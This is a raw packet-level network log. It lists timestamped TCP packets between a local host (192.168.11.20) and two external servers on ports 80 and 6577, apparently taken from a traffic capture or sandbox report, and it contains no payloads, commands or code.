Nov 25, 2021 11:26:35.879030943 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879045010 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879070997 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879092932 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879139900 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879187107 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879194021 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879232883 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879235983 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879283905 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879307032 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879332066 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879355907 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879381895 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879430056 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879437923 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879477024 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879523993 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879537106 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879570961 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879600048 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879617929 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879666090 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879681110 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879714012 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879760981 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879770994 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.879828930 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879899979 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.879942894 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.880013943 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.880085945 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.168067932 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168144941 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168183088 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168235064 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168314934 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168380976 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168417931 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.168520927 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168634892 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168761969 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168873072 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168905020 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.168921947 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.168970108 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169015884 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169063091 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169152021 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.169224024 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169272900 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169286966 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.169321060 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169368982 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169416904 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169436932 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.169464111 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169485092 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.169514894 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169563055 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169581890 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.169615030 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169662952 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169711113 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169742107 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.169758081 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169787884 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.169806957 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169853926 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169866085 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.169902086 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169914961 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.169950008 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.169996977 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170043945 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170046091 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170095921 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170095921 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170144081 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170159101 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170191050 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170239925 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170249939 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170288086 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170335054 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170376062 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170382977 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170428991 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170430899 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170479059 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170491934 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170526028 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170572996 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170574903 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170622110 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170670033 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170691967 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170717001 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170753002 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170766115 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170813084 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170825958 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170859098 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170907021 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.170936108 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.170953989 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171000957 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171014071 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.171047926 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171077013 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.171094894 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171144009 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171159983 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.171190023 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171236992 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171240091 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.171284914 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171331882 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171349049 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.171377897 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171426058 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171430111 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.171473026 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171503067 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.171519995 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171555996 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:36.171583891 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:36.171744108 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:40.319226980 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:26:40.370644093 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:26:40.370842934 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:26:40.371176004 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:26:40.474726915 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:26:40.496609926 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:26:40.499708891 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:26:40.513195992 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:40.513396025 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:40.599533081 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:27:10.305594921 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:27:10.306137085 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:27:10.306315899 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:27:10.306606054 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:27:10.306792021 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:27:10.317353010 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:27:10.418075085 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:06.056796074 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:06.078428030 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:06.182504892 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:07.894701958 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:07.925283909 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:08.018349886 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:09.404392958 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:09.684087992 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:09.684308052 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:09.684592009 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:09.965739012 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:09.965801001 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:09.965848923 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:09.965897083 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:09.965960979 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:09.966005087 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:09.966144085 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:09.974394083 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:09.976432085 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:10.080596924 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:10.247102022 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.247163057 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.247211933 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.247258902 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.247306108 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.247335911 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.247353077 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.247426987 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.247507095 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.247529984 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.247570992 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.247684002 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.247744083 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.527647018 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.527717113 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.527766943 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.527836084 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.527894974 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.527940989 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.527987003 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.528033018 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.528079033 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.528124094 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.528126001 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.528177023 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.528223038 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.528269053 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.528315067 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.528362036 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.528408051 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.528460979 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.528568029 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.810688019 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.810813904 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.810863018 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.810909986 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.810956955 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811002970 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811024904 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811049938 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811074018 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811100960 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811147928 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811187983 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811196089 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811227083 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811244011 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811290979 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811336040 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811348915 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811387062 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811388016 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811434984 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811481953 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811501980 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811528921 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811541080 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811578035 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811624050 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811670065 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811670065 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811708927 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811717033 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811764002 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811829090 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811829090 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811868906 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811898947 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811947107 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.811988115 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.811994076 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.812026978 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.812042952 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:10.812094927 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.812151909 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:10.812278032 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.091742992 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.091964006 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.092176914 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092228889 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092276096 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092423916 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092439890 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.092474937 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092484951 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.092524052 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092571020 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092618942 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092617989 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.092665911 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092711926 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092758894 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092804909 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092807055 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.092847109 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.092852116 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092866898 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.092900991 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092947006 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.092993021 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093014002 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093039036 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093086958 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093090057 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093132973 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093179941 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093208075 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093225956 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093226910 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093275070 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093319893 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093341112 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093367100 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093415022 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093432903 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093462944 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093481064 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093509912 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093558073 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093566895 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093604088 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093630075 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093651056 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093698978 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093746901 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093794107 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093810081 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093839884 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093858957 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093888044 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093907118 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093935966 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.093981028 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.093982935 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094031096 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094075918 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094120979 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094125032 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.094166994 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094213963 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094260931 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094305992 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094353914 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094400883 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094446898 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094492912 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094510078 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.094530106 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.094541073 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.094631910 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094639063 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094640970 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094687939 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.094691038 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094698906 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.094866037 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.094907999 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.094932079 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.094940901 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.095087051 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.379846096 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.379961014 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380017996 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380073071 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380125999 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380146980 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.380181074 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380206108 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.380219936 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.380235910 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380290985 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380347967 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380402088 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380436897 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.380456924 CET	80	49808	103.167.84.150	192.168.11.20
